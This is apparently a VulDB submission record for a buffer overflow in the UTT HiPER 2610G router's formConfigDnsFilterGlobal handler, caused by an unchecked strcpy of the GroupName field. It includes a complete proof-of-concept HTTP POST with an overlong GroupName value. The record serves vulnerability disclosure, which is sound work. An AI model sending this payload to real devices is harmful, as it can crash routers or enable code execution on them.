提出 #836278: UTT HiPER 2610G <=v3.0.0-171107 Buffer Overflow情報

タイトル	UTT HiPER 2610G <=v3.0.0-171107 Buffer Overflow
説明	A critical overflow vulnerability exists in the UTT HiPER 2610G version v3.0.0-171107 router. By controlling parameters, attackers can send malicious HTTP post packets through the path /goform/formConfigDnsFilterGlobal to cause denial-of-service attacks and even arbitrary code execution, specifically through strcpy((char )(InstPointByIndex + 180), src); ``` POST /goform/formConfigDnsFilterGlobal HTTP/1.1 Host: 192.168.1.1 Content-Length: 1822 Cache-Control: max-age=0 Authorization: Digest username="admin", realm="UTT", nonce="80758026511f147977ce8ea9363e038c", uri="/goform/formArpBindGlobalConfig", algorithm=MD5, response="3c90b3b4d198905f88cf1301ff8ad6b5", opaque="5ccc069c403ebaf9f0171e9517f40e41", qop=auth, nc=000001a1, cnonce="71e33390dc75c484" Origin: http://192.168.1.1 Content-Type: application/x-www-form-urlencoded Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://192.168.1.1/IPMac.asp Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: language=zhcn; utt_bw_rdevType=; td_cookie=2522114788 Connection: close DnsFilterEnable=on&sourceIP=ipRange&GroupName=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ```
ソース	⚠️ https://github.com/HungryGoogle/log_attack/tree/main/index3
ユーザー	liwenqing (UID 92587)
送信	2026年05月24日 00:21 (17 日 ago)
モデレーション	2026年06月07日 17:57 (15 days later)
ステータス	承諾済み
VulDBエントリ	369137 [UTT HiPER 2610G 迄 3.0.0-171107 formConfigDnsFilterGlobal strcpy GroupName メモリ破損]
ポイント	20

◂ 前概要次 ▸

Do you want to use VulDB in your project?

Use the official API to access entries easily!